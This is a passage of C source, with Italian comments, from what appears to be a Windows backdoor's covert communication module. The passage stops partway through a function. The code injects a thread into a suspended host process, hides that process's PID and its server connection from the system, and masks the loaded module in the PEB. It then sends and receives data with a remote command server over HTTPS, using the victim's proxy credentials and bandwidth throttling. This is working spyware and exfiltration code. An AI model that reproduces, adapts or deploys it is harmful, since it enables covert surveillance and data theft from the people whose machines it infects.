#include "common.h"
#include "H4-DLL.h" 
#include "ASP.h"
#include "AM_Core.h"
#include "cert.h"
#include <winhttp.h>
#include <stdio.h>
#include <shlwapi.h>

#define SHARE_MEMORY_ASP_COMMAND_NAME "H4ASPIPCC"
#define SHARE_MEMORY_ASP_DATA_NAME "H4ASPIPCD"
#define ASP_SLEEP_TIME 20
#define ASP_START_TIMEOUT 60000 // un minuto di attesa per far inizializzare il processo host ASP
#define ASP_CONNECT_TIMEOUT 10000 // timeout prima di determinare che il server non e' raggiungibile

// Altri prototipi usati dal thread ASP
typedef void (__stdcall *ASP_MainLoop_t) (char *);
typedef void (__stdcall *ExitProcess_T) (UINT);
extern void HidePEB(HMODULE);
extern DWORD pCommonGetProcAddress;
extern DWORD pCommonLoadLibrary;
extern DWORD pCommonFreeLibrary;

#define HOSTNAMELEN 256
typedef struct {
	HMCommonDataStruct pCommon;     // Necessario per usare HM_sCreateHookA. Definisce anche le funzioni come LoadLibrary
	char cDLLHookName[DLLNAMELEN];	// Nome della dll principale ("H4.DLL")
	char cASPServer[HOSTNAMELEN];   // server ASP
	char cASPMainLoop[64];          // Nome della funzione ASP
	ExitProcess_T pExitProcess;
} ASPThreadDataStruct;
ASPThreadDataStruct ASPThreadData;

#define SYNC_CMD "SYNC"	// Dato inviato per la sincronizzazione delle winhttp
#define SYNC_LEN 4

// Struttura per il passaggio dei comandi ASP in shared memory
#define ASP_READ  1
#define ASP_WRITE 2
#define ASP_SETUP 3 // Inizializza ASP (fa ritornare in out_param l'ip da nascondere)

#define ASP_NOP   0 // Nessuna operazione da eseguire
#define ASP_FETCH 1 // ASP host deve eseguire l'action
#define ASP_DONE  2 // ASP host ha finito con successo
#define ASP_ERROR 3 // ASP host ha finito con un errore
typedef struct {
	DWORD action;    // Azione da eseguire 
	DWORD data_size; // dimensione dei dati da leggere/scrivere
	DWORD in_param;  // parametro di input
	DWORD out_param; // valore di output
	DWORD alt_param; // parametro "jolly" (viene usato ad esempio per memorizzare 
	                 // il buffer di output, se presente, per le ASP_Read).
	DWORD status;    // stato dell'operazione (va settato per ultimo)
} ASP_IPCCommandDataStruct;


HANDLE ASP_HostProcess = NULL; // Processo che gestisce ASP
ASP_IPCCommandDataStruct *ASP_IPC_command = NULL;  // Area di shared memory per dare comandi al processo ASP
HANDLE hASPIPCcommandfile = NULL;                  // File handle della shared memory dei comandi
BYTE *ASP_IPC_data = NULL;     // Area di shared memory per inviare i dati ad ASP
HANDLE hASPIPCdatafile = NULL; // File handle del file da inviare/ricevere
connection_hide_struct connection_hide = NULL_CONNETCION_HIDE_STRUCT; // struttura per memorizzare il pid da nascondere
pid_hide_struct pid_hide = NULL_PID_HIDE_STRUCT; // struttura per memorizzare la connessione da nascondere
HINTERNET hRequest = 0; // Handle usato dalle winhttp per inviare/ricevere dati

///////////////////////////////////////////
// Funzioni per lanciare il thread ASP   //
///////////////////////////////////////////

// Thread remoto iniettato nel processo ASP host
DWORD ASP_HostThread(ASPThreadDataStruct *pDataThread)
{
	HMODULE hASPDLL;
	ASP_MainLoop_t pASP_MainLoop;

	hASPDLL = pDataThread->pCommon._LoadLibrary(pDataThread->cDLLHookName);
	if (!hASPDLL)
		pDataThread->pExitProcess(0);

	pASP_MainLoop = (ASP_MainLoop_t)pDataThread->pCommon._GetProcAddress(hASPDLL, pDataThread->cASPMainLoop);
	
	// Invoca il ciclo principale di ASP
	if (pASP_MainLoop)
		pASP_MainLoop(pDataThread->cASPServer);

	// Se il ciclo principale esce per qualche errore
	// il processo host viene chiuso
	pDataThread->pExitProcess(0);
	return 0;
}


// Lancia il thread di ASP nel processo dwPid
BOOL ASP_StartASPThread(DWORD dwPid)
{
	HANDLE hThreadRem;
	DWORD dwThreadId;

	if (!ASP_HostProcess)
		return FALSE;

	// Alloca dati e funzioni del thread ASP nel processo dwPid
	if(HM_sCreateHookA(dwPid, NULL, NULL, (BYTE *)ASP_HostThread, 600, (BYTE *)&ASPThreadData, sizeof(ASPThreadData)) == NULL)
		return FALSE;
	
	if ( !(hThreadRem = HM_SafeCreateRemoteThread(ASP_HostProcess, NULL, 8192, 
	  									   (LPTHREAD_START_ROUTINE)ASPThreadData.pCommon.dwHookAdd, 
									       (LPVOID)ASPThreadData.pCommon.dwDataAdd, 0, &dwThreadId)) )
		return FALSE;
		
	// Non e' necessario avere un handle aperto sul
	// thread di ASP
	CloseHandle(hThreadRem);

	return TRUE;
}

// Inizializza le strutture necessarie ad ASP
// Torna 0 se ha successo
DWORD ASP_Setup(char *asp_server)
{
	HMODULE hMod;

	VALIDPTR(hMod = GetModuleHandle("KERNEL32.DLL"));

	// API utilizzate dal thread remoto.... [KERNEL32.DLL]
	VALIDPTR(ASPThreadData.pCommon._LoadLibrary = (LoadLibrary_T) pCommonLoadLibrary);
	VALIDPTR(ASPThreadData.pCommon._GetProcAddress = (GetProcAddress_T) pCommonGetProcAddress);
	VALIDPTR(ASPThreadData.pExitProcess = (ExitProcess_T) HM_SafeGetProcAddress(hMod, "ExitProcess"));

	HM_CompletePath(H4DLLNAME, ASPThreadData.cDLLHookName);
	_snprintf_s(ASPThreadData.cASPServer, sizeof(ASPThreadData.cASPServer), _TRUNCATE, "%s", asp_server);
	_snprintf_s(ASPThreadData.cASPMainLoop, sizeof(ASPThreadData.cASPMainLoop), _TRUNCATE, "HFF7");

	return 0;
}




////////////////////////////////////
// Funzioni IPC command per ASP   //
////////////////////////////////////
// Usata dall'host ASP per attaccarsi alla shared memory
BOOL ASP_IPCAttach()
{
	HANDLE h_file = OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, SHARE_MEMORY_ASP_COMMAND_NAME);

	// Riutilizza ASP_IPC_command tanto non l'host ASP non lo condivide 
	// con il core
	if (h_file) 
		ASP_IPC_command = (ASP_IPCCommandDataStruct *)MapViewOfFile(h_file, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(ASP_IPCCommandDataStruct));

	if (ASP_IPC_command)
		return TRUE;

	return FALSE;
}


// Inizializza nel core la shared memory per ASP
BOOL ASP_IPCSetup()
{
	hASPIPCcommandfile = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, sizeof(ASP_IPCCommandDataStruct), SHARE_MEMORY_ASP_COMMAND_NAME);
	if (hASPIPCcommandfile)
		ASP_IPC_command = (ASP_IPCCommandDataStruct *)MapViewOfFile(hASPIPCcommandfile, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(ASP_IPCCommandDataStruct));

	if (ASP_IPC_command) {
		memset(ASP_IPC_command, 0, sizeof(ASP_IPCCommandDataStruct));
		return TRUE;
	}

	return FALSE;
}

// Chiude nel core la shared memory per ASP
void ASP_IPCClose()
{
	if (ASP_IPC_command) {
		UnmapViewOfFile(ASP_IPC_command);
		ASP_IPC_command = NULL;
	}

	SAFE_CLOSE_HANDLE(hASPIPCcommandfile);
}

/////////////////////////
// Funzioni di winhttp //
/////////////////////////

// Ritorna l'ip del server in ascii
// NULL se fallisce.
char *ASP_ResolveName(char *server_name)
{
	WORD wVersionRequested;
	WSADATA wsaData;
	struct hostent *hAddress;

	// E' gia' un indirizzo IP
	if (inet_addr(server_name) != INADDR_NONE) 
		return server_name;

	wVersionRequested = MAKEWORD( 2, 2 );
	if ( WSAStartup( wVersionRequested, &wsaData )!= 0 )
		return NULL;

	hAddress = gethostbyname(server_name);

	WSACleanup();

	if (!hAddress)
		return NULL;

	return inet_ntoa(*(struct in_addr*)hAddress->h_addr);
}


// Inizializza le WinHTTP
// Gli handle vengono lasciati aperti anche se qualcosa fallisce
// tanto poi la prima Read o Write fallira' (l'handle hRequest sara' nullo)
// e il processo core dovrebbe terminare l'host ASP (e con esso tutti gli handle).
void ASP_WinHTTPSetup(char *server_ip)
{
	WINHTTP_CURRENT_USER_IE_PROXY_CONFIG ProxyConfig;
	WINHTTP_PROXY_INFO ProxyInfo;
	WINHTTP_AUTOPROXY_OPTIONS OptPAC;
	DWORD dwOptions = 0;
	BOOL isProxy = FALSE;
	wchar_t  _wHost[128]; 
	wchar_t  _wHostProto[128]; 	
	HINTERNET hSession = 0, hConnect = 0;
	char *types[] = { "*\x0/\x0*\x0",0 };

	// Inidirizzo ip del server in wide char
	// per utilizzarlo nelle funzioni direttamente
	swprintf(_wHost, L"%S", server_ip);
	swprintf(_wHostProto, L"https://%S", server_ip);

	// Crea una sessione per winhttp.
	// L'eventuale proxy verra' settato in seguito
    if ( !(hSession = WinHttpOpen( L"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",  
                                   WINHTTP_ACCESS_TYPE_NO_PROXY, 0, WINHTTP_NO_PROXY_BYPASS, 0)) )
		return;

	// winhttp fornira' le credenziali dell'utente 
	// per ogni richiesta di autenticazione
	dwOptions = WINHTTP_AUTOLOGON_SECURITY_LEVEL_LOW;
	WinHttpSetOption(hSession, WINHTTP_OPTION_AUTOLOGON_POLICY, &dwOptions, sizeof(DWORD));

	// Cerca nel registry le configurazioni del proxy
	if (WinHttpGetIEProxyConfigForCurrentUser(&ProxyConfig)) {
		// I metodi di configurazione sono nell'ordine inverso
		// rispetto a come li considera internet explorer
		// In questo modo l'ultimo che riesce a trovare un proxy 
		// verra' utilizzato.
		if (ProxyConfig.lpszProxy) {
			// Proxy specificato
			ProxyInfo.lpszProxy = ProxyConfig.lpszProxy;
			ProxyInfo.dwAccessType = WINHTTP_ACCESS_TYPE_NAMED_PROXY;
			ProxyInfo.lpszProxyBypass = NULL;
			isProxy = TRUE;
		}

		if (ProxyConfig.lpszAutoConfigUrl) {
			// Script proxy pac
			OptPAC.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL;
			OptPAC.lpszAutoConfigUrl = ProxyConfig.lpszAutoConfigUrl;
			OptPAC.dwAutoDetectFlags = 0;
			OptPAC.fAutoLogonIfChallenged = TRUE;
			OptPAC.lpvReserved = 0;
			OptPAC.dwReserved = 0;

			if (WinHttpGetProxyForUrl(hSession ,_wHostProto, &OptPAC, &ProxyInfo))
				isProxy = TRUE;
		}

		if (ProxyConfig.fAutoDetect) {
			// Autodetect proxy
			OptPAC.dwFlags = WINHTTP_AUTOPROXY_AUTO_DETECT;
			OptPAC.dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A;
			OptPAC.fAutoLogonIfChallenged = TRUE;
			OptPAC.lpszAutoConfigUrl = NULL;
			OptPAC.lpvReserved = 0;
			OptPAC.dwReserved = 0;

			if (WinHttpGetProxyForUrl(hSession ,_wHostProto, &OptPAC, &ProxyInfo))
				isProxy = TRUE;
		}
	}

	// Settiamo il proxy se ne abbiamo bisogno
	// XXX Qui da ProxyInfo dovremmo nascondere la connessione al proxy
	// Questa viene vista solo nelle TCP row NON extended (altrimenti nasconde il PID)
	if (isProxy)
		WinHttpSetOption(hSession, WINHTTP_OPTION_PROXY, &ProxyInfo, sizeof(ProxyInfo));

	// Definisce il target
	if ( !(hConnect = WinHttpConnect( hSession, (LPCWSTR) _wHost, INTERNET_DEFAULT_HTTPS_PORT, 0)))
		return;
	// Crea la richiesta
	if ( !(hRequest = WinHttpOpenRequest( hConnect, L"POST", L"/", NULL, WINHTTP_NO_REFERER, (LPCWSTR *) types, WINHTTP_FLAG_SECURE)) )
		return;

	// Setta i timeout:
	// resolve = 1 millisecondo (usa indirizzi IP)
	// connect = 10 secondi
	// send e receive = infinito (una volta connesso si aspetta di 
	//                  mandare e ricevere, se il protocollo e' corretto. Altrimenti
	//                  posso usare le ASP_Read/Write non bloccanti o affidarmi ai 
	//				    timeout TCP...spero).
	WinHttpSetTimeouts(hRequest, 1, ASP_CONNECT_TIMEOUT, -1, -1);
}

// Invia il buffer rispettando il limite di banda di byte_per_second
BOOL ASP_BandSafeSend(HINTERNET hReq, BYTE *buf, DWORD len, DWORD byte_per_second)
{
#define SAMPLING_RATE 15
	DWORD byte_per_sample = byte_per_second/SAMPLING_RATE;
	DWORD byte_sent = 0, byte_to_send;
	DWORD time_start, time_stop, time_expected;
	wchar_t  _wheaders[1024];

	// Verifica che non abbia usato un byte_per_second troppo basso
	if (byte_per_sample == 0)
		byte_per_sample = 1;
	if (byte_per_second == 0)
		byte_per_second = 1;

	// Inizia la richiesta
	swprintf(_wheaders, L"%ls %d", L"Content-Length:", len);
	if (!WinHttpAddRequestHeaders( hReq, _wheaders, -1, WINHTTP_ADDREQ_FLAG_REPLACE))
		return FALSE;
	if (!WinHttpSendRequest( hReq, WINHTTP_NO_ADDITIONAL_HEADERS, -1L, WINHTTP_NO_REQUEST_DATA, 0, len, NULL))
		return FALSE;

	// Cicla finche' non spedisce tutti i byte
	while (byte_sent < len)	{
		// Vede se i byte ancora da mandare eccedono
		// quelli inviabili in un "sample" di tempo
		byte_to_send = len - byte_sent;
		if (byte_to_send > byte_per_sample)
			byte_to_send = byte_per_sample;

		time_start = GetTickCount();
		// byte_to_send sono quelli da inviare in questo sample
		// (dopo la funzione sono quelli effettivamente inviati)
		if (!WinHttpWriteData(hReq, buf + byte_sent, byte_to_send, &byte_to_send))
			return FALSE;
		// Calcola quanti millisecondi avrebbe dovuto impiegare questa spedizione
		time_expected = (byte_to_send*1000) / byte_per_second;
		time_stop = GetTickCount();
		// Se il tempo atteso e' maggiore di quello passato,
		// aspetta i millisecondi rimanenti
		// Se arriva al riavvolgimento (time_stop < time_start), l'expected
		// sara' sicuramente minore.
		if (time_expected > (time_stop - time_start))
			Sleep( time_expected - (time_stop - time_start));

		// Aggiorna i byte inviati
		byte_sent += byte_to_send;
	}

	return TRUE;
}


BOOL ASP_DataSend(BYTE *data, DWORD data_size, DWORD band_limit)
{
	BYTE dummy_resp[4];
	DWORD bytes_read;

	// Controlla che le winhttp siano inizializzate correttamente
	if (!hRequest)
		return FALSE;

	// Invia i dati
	if (!ASP_BandSafeSend(hRequest, data, data_size, band_limit))
		return FALSE;

	// Legge la risposta di SYNC
	if(!WinHttpReceiveResponse(hRequest, 0)) 
		return FALSE;
	if(!WinHttpReadData(hRequest, dummy_resp, SYNC_LEN, &bytes_read)) 
		return FALSE;	

	// Si aspetta di ricevere in risposta il comando di SYNC
	if (bytes_read!=SYNC_LEN || memcmp(dummy_resp, SYNC_CMD, SYNC_LEN))
		return FALSE;

	return TRUE;
}

BOOL ASP_DataReceive(BYTE *data, DWORD *data_size)
{
	DWORD bytes_read;
	wchar_t  _wheaders[1024];

	// Controlla che le winhttp siano inizializzate correttamente
	if (!hRequest)
		return FALSE;

	// Invia una richiesta di sincronizzazione
	swprintf(_wheaders, L"%ls %d", L"Content-Length:", SYNC_LEN);
	if (!WinHttpAddRequestHeaders(hRequest, _wheaders, -1, WINHTTP_ADDREQ_FLAG_REPLACE))
		return FALSE;
	if(!WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, -1, SYNC_CMD , SYNC_LEN, SYNC_LEN, NULL)) 
		return FALSE;

	// Legge i dati ricevuti
	if(!WinHttpReceiveResponse(hRequest, 0)) 
		return FALSE;
	if(!WinHttpReadData(hRequest, data, *data_size, &bytes_read)) 
		return FALSE;	

	// data_size era il numero massimo di byte che volevamo leggere.
	// Ora e' il numero di byte effettivamente letti.
	*data_size = bytes_read;

	return TRUE;
}

// Verifica l'issuer del certificato (ma NON la firma), per impedire MITM immediati
// XXX In realta' chiunque puo' creare un certificato identico a quello del server
// e firmarselo...ma a quel punto la backdoor sarebbe gia' stata scoperta...
BOOL ASP_Authenticate()
{
	DWORD dwOptions;
	CERT_CONTEXT *cert_info = NULL;
	DWORD info_size = 4;
	BOOL ret;

	// Controlla che le winhttp siano inizializzate correttamente
	if (!hRequest)
		return FALSE;

	// Fa una richiesta che DEVE fallire (XXX il certificato NON deve essere riconosciuto)
	if (WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, -1L, WINHTTP_NO_REQUEST_DATA, 0, 0, NULL))
		return FALSE;

	// Verifica la bonta' del certificato
	if (!WinHttpQueryOption(hRequest, WINHTTP_OPTION_SERVER_CERT_CONTEXT, &cert_info, &info_size))
		return FALSE;
	if (!cert_info) 
		return FALSE;
	if (cert_info->pCertInfo->SubjectPublicKeyInfo.PublicKey.cbData != sizeof(public_key)) {
		CertFreeCertificateContext(cert_info);
		return FALSE;
	}
	if (memcmp(cert_info->pCertInfo->SubjectPublicKeyInfo.PublicKey.pbData, public_key, sizeof(public_key))) {
		CertFreeCertificateContext(cert_info);
		return FALSE;
	}
	CertFreeCertificateContext(cert_info);

	// Una volta verificato il certificato rimette le policy 
	dwOptions = SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
	WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwOptions, sizeof(DWORD));
	return TRUE;
}

//////////////////////////////////////////////////
// Funzione esportata                           //
// Viene caricata dal thread ASP nel processo   //
// ASP host.                                    //
//////////////////////////////////////////////////
void __stdcall  ASP_MainLoop(char *asp_server)
{
	BOOL ret_success = FALSE;
	char *server_ip;
	BOOL authenticated = FALSE;

	// Modifica il nome del modulo nella peb
	HidePEB(GetModuleHandle(H4DLLNAME));

	// Al ritorno ASP_IPC_command e' sicuramente valorizzato.
	// Non fa il detach tanto alla fine il processo sara' chiuso 
	// con ASP_Stop()
	if (!ASP_IPCAttach())
		return;

	// Risolvere il nome simbolico (se non e' un indirizzo IP)
	server_ip = ASP_ResolveName(asp_server);
	if (server_ip) {
		// Se ottiene l'indirizzo IP inizializza le winhttp
		ASP_WinHTTPSetup(server_ip);
		// e ritorna con successo l'ip da nascondere al processo padre
		ASP_IPC_command->out_param = inet_addr(server_ip);
		ASP_IPC_command->status = ASP_DONE;
	} else
		ASP_IPC_command->status = ASP_ERROR;

	LOOP {
		Sleep(ASP_SLEEP_TIME);
		// Se non ha comandi da eseguire
		if (ASP_IPC_command->status != ASP_FETCH)
			continue;

		// Quando cerca di eseguire il primo comando, cerca di autenticarsi
		// al server (e viceversa)
		if (!authenticated) {
			// Se fallisce lascia lo stato come non autenticato, notifica l'errore
			// e riprende il ciclo...
			if (!ASP_Authenticate()) {
				ASP_IPC_command->status = ASP_ERROR;
				continue;
			}
			authenticated = TRUE;
		}
		
		// Si attacca alla shared memory con i dati da spedire/ricevere
		hASPIPCdatafile = OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, SHARE_MEMORY_ASP_DATA_NAME);
		if (hASPIPCdatafile) // Puo' riutilizzare ASP_IPC_data (non e' condivisa con il core)
			ASP_IPC_data = (BYTE *)MapViewOfFile(hASPIPCdatafile, FILE_MAP_ALL_ACCESS, 0, 0, ASP_IPC_command->data_size);
		// Se fallisce l'attach notifica l'errore e riprende il ciclo
		if (!ASP_IPC_data) {
			ASP_IPC_command->status = ASP_ERROR;
			SAFE_CLOSE_HANDLE(hASPIPCdatafile);
			continue;
		}


		// Esegue la spedizione/ricezione dei dati a seconda dell'action
		if (ASP_IPC_command->action == ASP_WRITE)
			ret_success = ASP_DataSend(ASP_IPC_data, ASP_IPC_command->data_size, ASP_IPC_command->in_param);
		if (ASP_IPC_command->action == ASP_READ) // Aggiorna anche ASP_IPC_command->data_size con il numero di byte letti
			ret_success = ASP_DataReceive(ASP_IPC_data, &ASP_IPC_command->data_size);
 
		// Notifica la fine delle operazioni di lettura/scrittura
		if (ret_success)
			ASP_IPC_command->status = ASP_DONE;
		else
			ASP_IPC_command->status = ASP_ERROR;

		// Chiude gli handle alla shared memory dei dati
		UnmapViewOfFile(ASP_IPC_data);
		ASP_IPC_data = NULL;
		SAFE_CLOSE_HANDLE(hASPIPCdatafile);
	}
}






/////////////////////////////
//    Funzioni pubbliche   //
// ASP_Start()             //
// ASP_Stop()              //
// ASP_Read()              //
// ASP_Write()             //
// ASP_Poll()              //
/////////////////////////////

// Se le funzioni ASP_Read e ASP_Write sono non blocking (e tornano TRUE)
// il processo puo' monitorare lo stato della spedizione con questa funzione.
// Puo' tornare ASP_POLL_FETCHING ASP_POLL_DONE o ASP_POLL_ERROR.
// Se torna ASP_POLL_DONE o ASP_POLL_ERROR chiude anche tutto quello relativo
// alla shared memory.
// Se il processo decide che ASP_Read e ASP_Write ci stanno impiegando troppo
// (si e' verificato qualche tipo di errore) puo' invocare ASP_Stop che termina
// il processo ASP e chiude tutti gli handle relativi (anche quelli relativi
// alla spedizione dei dati).
// Anche se ASP_Poll torna ASP_POLL_ERROR il processo "dovrebbe" invocare ASP_Stop
// e ricominciare tutto da capo (non potendo determinare che tipo di errore si
// e' verificato).
// Nel caso di ASP_Read, questa funzione copia anche il buffer letto nella memoria
// allocata dal processo (alla fine dell'operazione di lettura).
// L' operazione ASP_Write e' considerata conclusa quando invia
// il numero totale di byte specificato (nel caso si spedisca un file
// si considera la dimensione totale del file). La ASP_Read puo' ricevere anche di meno,
// anche se fa di tutto per ricevere il numero esatto.
// Se "bytes" non e' nullo, ASP_Poll ci scrive dentro i byte letti o scritti dalla
// precedente ASP_Read o ASP_Write (se ha avuto successo).
// --> NB. Read e Write possono gestire massimo file che possono mappare in memoria
// come dimensioni (dovrei gestire invii in piu' parti da parte delle funzioni
// di spedizione del thread ASP).
DWORD ASP_Poll(DWORD *bytes)
{
	// Controlla che la shared mem dei comandi sia attiva
	if (!ASP_IPC_command)
		return ASP_POLL_ERROR;

	// Se sta ancora eseguendo l'operazione
	if (ASP_IPC_command->status == ASP_FETCH)
		return ASP_POLL_FETCHING;

	// Se l'operazione ha avuto successo e siamo interessati ai byte
	// letti/scritti. (data_size e' stato modificato dall'host ASP
	// nel caso di un'ASP_Read che ha letto meno byte del previsto)
	if (ASP_IPC_command->status == ASP_DONE && bytes)
		*bytes = ASP_IPC_command->data_size;

	// Se ha finito un operazione di lettura (ed era una lettura in memoria
	// e non su file) copia nel buffer allocato dal processo (e memorizzato 
	// in ASP_IPC_command->alt_param) tutti i dati letti.
	if (ASP_IPC_command->status == ASP_DONE &&
		ASP_IPC_command->action == ASP_READ &&
		ASP_IPC_command->alt_param) 
		memcpy((BYTE *)ASP_IPC_command->alt_param, ASP_IPC_data, ASP_IPC_command->data_size);

	// Ha terminato (o mai iniziato) l'operazione
	// e chiude la shared mem dei dati
	if (ASP_IPC_data) {
		UnmapViewOfFile(ASP_IPC_data);
		ASP_IPC_data = NULL;
	}
	SAFE_CLOSE_HANDLE(hASPIPCdatafile);

	// ASP ha tornato un errore
	if (ASP_IPC_command->status == ASP_ERROR) {
		ASP_IPC_command->status = ASP_NOP;
		return ASP_POLL_ERROR;
	}

	// Se lo status e' ASP_NOP o ASP_DONE.
	// Puo' settare ASP_IPC_command->status, tanto se non e' in
	// ASP_FETCH l'host ASP non modifica piu' lo status
	ASP_IPC_command->status = ASP_NOP; 
	return ASP_POLL_DONE;

}

// Lancia process_name come host ASP verso il server asp_server
// Torna TRUE se ha successo.
BOOL ASP_Start(char *process_name, char *asp_server)
{
	STARTUPINFO si;
    PROCESS_INFORMATION pi;
	DWORD init_timeout;
	
	// Inizializza le strutture per il thread iniettato
	if ( ASP_Setup(asp_server) != 0 )
		return FALSE;

	// Inizializza la shared memory
	if (!ASP_IPCSetup()) {
		ASP_IPCClose();
		return FALSE;
	}

	// L'host ASP setta il comando di inizializzazione
	// Deve essere sempre il primo comando dato all'host ASP
	// che si conclude con il ritorno dell'ip da nascondere
	// (necessario per poter fare ASP_Poll() in seguito
	ASP_IPC_command->action = ASP_SETUP;
	ASP_IPC_command->status = ASP_FETCH;

	// Lancia il process ASP host con il main thread stoppato
	ZeroMemory( &si, sizeof(si) );
    si.cb = sizeof(si);
	HM_CreateProcess(process_name, CREATE_SUSPENDED, &si, &pi, 0);
	// Se HM_CreateProcess fallisce, pi.dwProcessId e' settato a 0
	if (!pi.dwProcessId) {
		ASP_Stop();
		return FALSE;
	}

	// HM_CreateProcess ritorna solo il PID del figlio, non apre
	// handle al processo o al thread (quelli vengono chiusi del thread
	// iniettato in explorer)
	ASP_HostProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pi.dwProcessId);
	if(ASP_HostProcess == NULL) {
		ASP_Stop();
		return FALSE;
	}
	
	// Aggiunge pi.dwProcessId alla lista dei PID da nascondere 
	// (e lo memorizza in pid_hide per poi poter togliere l'hide)
	SET_PID_HIDE_STRUCT(pid_hide, pi.dwProcessId);
	AM_AddHide(HIDE_PID, &pid_hide);

	// XXX Sleep Aspettiamo che il thread di injection in iexplorer
	// abbia finito 
	Sleep(3000);

	// Lancia il thread di ASP che eseguira' il main loop 
	if (!ASP_StartASPThread(pi.dwProcessId)) {
		ASP_Stop();
		return FALSE;
	}

	// Attende che l'host ASP abbia tornato l'indirizzo IP da nascondere
	for (init_timeout=0; init_timeout < ASP_START_TIMEOUT; init_timeout+=ASP_SLEEP_TIME) {
		DWORD ret_val;

		Sleep(ASP_SLEEP_TIME);
		ret_val = ASP_Poll(NULL);
		if (ret_val == ASP_POLL_FETCHING)
			continue;

		// Se ha concluso con successo legge l'ip (da out_param), 
		// lo memorizza nella struttura connection_hide e lo nasconde
		if (ret_val == ASP_POLL_DONE) {
			// XXX Non nasconde la connessione al proxy
			// Qeusta viene vista solo per le TCP row NON extended 
			// (altrimenti nasconde il PID)
			SET_CONNETCION_HIDE_STRUCT(connection_hide, ASP_IPC_command->out_param, htons(443));
			AM_AddHide(HIDE_CNN, &connection_hide);
			return TRUE;
		}

		// Ha tornato ASP_POLL_ERROR
		break;
	}

	// Se e' scaduto il timeout di attesa per lo startup
	// o l'host ASP ha tornato un errore, allora lo termina
	// ed esce
	ASP_Stop();
	return FALSE;
}


// Termina l'uso di ASP (e del processo relativo)
void ASP_Stop()
{
	// Termina il processo host ASP e chiude la shared
	// memory relativa ai comandi
	SAFE_TERMINATEPROCESS(ASP_HostProcess);
	ASP_IPCClose();

	// Chiude anche la shared mem relativa ai dati
	// nel caso venga invocato Stop durante l'esecuzione
	// di una ASP_Read o ASP_Write non bloccante.
	if (ASP_IPC_data) {
		UnmapViewOfFile(ASP_IPC_data);
		ASP_IPC_data = NULL;
	}
	SAFE_CLOSE_HANDLE(hASPIPCdatafile);

	// Se sono stati memorizzati (struttura settata),e quindi aggiunti,
	// una connessione o un PID da nascondere, li toglie dalla lista di 
	// hiding e azzera le struttura relative
	if (IS_SET_CONNETCION_HIDE_STRUCT(connection_hide)) {
		AM_RemoveHide(HIDE_CNN, &connection_hide);
		UNSET_CONNETCION_HIDE_STRUCT(connection_hide);
	}

	if (IS_SET_PID_HIDE_STRUCT(pid_hide)) {
		AM_RemoveHide(HIDE_PID, &pid_hide);
		UNSET_PID_HIDE_STRUCT(pid_hide);
	}
}


// Legge "filename" o in_buf (per un massimo di data_size byte).
// Cerca comunque di leggere la dimensione esatta.
// Ritorna TRUE se ha successo. (bytes_read puo' essere nullo)
BOOL ASP_Read(char *filename, BYTE *in_buf, DWORD data_size, BOOL blocking, DWORD *bytes_read)
{
	HANDLE hfile = INVALID_HANDLE_VALUE; // Se filename e' NULL, mappa su file di paging
	DWORD mem_size = data_size; 

	// Controlla che il processo host ASP sia ancora aperto e che non stia
	// gia' eseguendo delle operazioni
	if (!ASP_HostProcess || !ASP_IPC_command || ASP_IPC_command->status != ASP_NOP)
		return FALSE;

	// Controlla che ci sia una destinazione per i dati
	if (!filename && !in_buf)
		return FALSE;

	// Controlla che ci sia spazio per ricevere
	if (data_size == 0)
		return FALSE;

	ASP_IPC_data = NULL; // Lo inizializza solo per paranoia (se non viene rispettato l'ordine di chiamata delle funzioni)

	// Se filename e' settato, inizializza le variabili per
	// mapparlo.
	if (filename) 
		if ( (hfile = CreateFile(filename, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, 0, NULL)) ==  INVALID_HANDLE_VALUE )
			return FALSE;

	hASPIPCdatafile = CreateFileMapping(hfile, NULL, PAGE_READWRITE, 0, mem_size, SHARE_MEMORY_ASP_DATA_NAME);
	// hfile non serve piu' come handle (se filename e' settato)
	SAFE_CLOSE_HANDLE(hfile);

	if (hASPIPCdatafile)
		ASP_IPC_data = (BYTE *)MapViewOfFile(hASPIPCdatafile, FILE_MAP_ALL_ACCESS, 0, 0, mem_size);

	// Se non e' riuscito a creare il file mapping
	if (!ASP_IPC_data) {
		SAFE_CLOSE_HANDLE(hASPIPCdatafile);
		return FALSE;
	}

	// Istruisce l'host ASP per mandare i dati
	ASP_IPC_command->data_size = data_size;
	ASP_IPC_command->in_param = 0;
	ASP_IPC_command->action = ASP_READ;
	// Se deve leggere un buffer di memoria, memorizza l'indirizzo di output
	// in alt_param. Se filename e' settato, ignora in_buf.
	if (!filename) 
		ASP_IPC_command->alt_param = (DWORD)in_buf;
	else
		ASP_IPC_command->alt_param = 0;
	ASP_IPC_command->status = ASP_FETCH; // Per ultima cosa dice all'host ASP di fetchare il comando

	// Se e' bloccante aspetta un responso dall'host ASP
	if (blocking) 
		LOOP {
			DWORD ret_val;

			Sleep(ASP_SLEEP_TIME);
			ret_val = ASP_Poll(bytes_read);
			if (ret_val == ASP_POLL_FETCHING)
				continue;

			if (ret_val == ASP_POLL_ERROR)
				return FALSE;

			// Se ha tornato ASP_POLL_DONE allora esce
			// dal ciclo e ritorna TRUE
			break;
		}
	
	// Se la funzione e' blocking, ASP_Poll chiudera' tutto quello relativo alla 
	// shared memory. Altrimenti ci dovra' pensare il processo chiamando ASP_Poll
	return TRUE;
}


// Spedisce "filename" per intero o in_buf (data_size byte).
// Spedisce massimo "band_limit" byte per secondo.
// Ritorna TURE se ha successo.
// Puo' spedire massimo file che riesce a mappare in memoria.
BOOL ASP_Write(char *filename, BYTE *in_buf, DWORD data_size, BOOL blocking, DWORD band_limit)
{
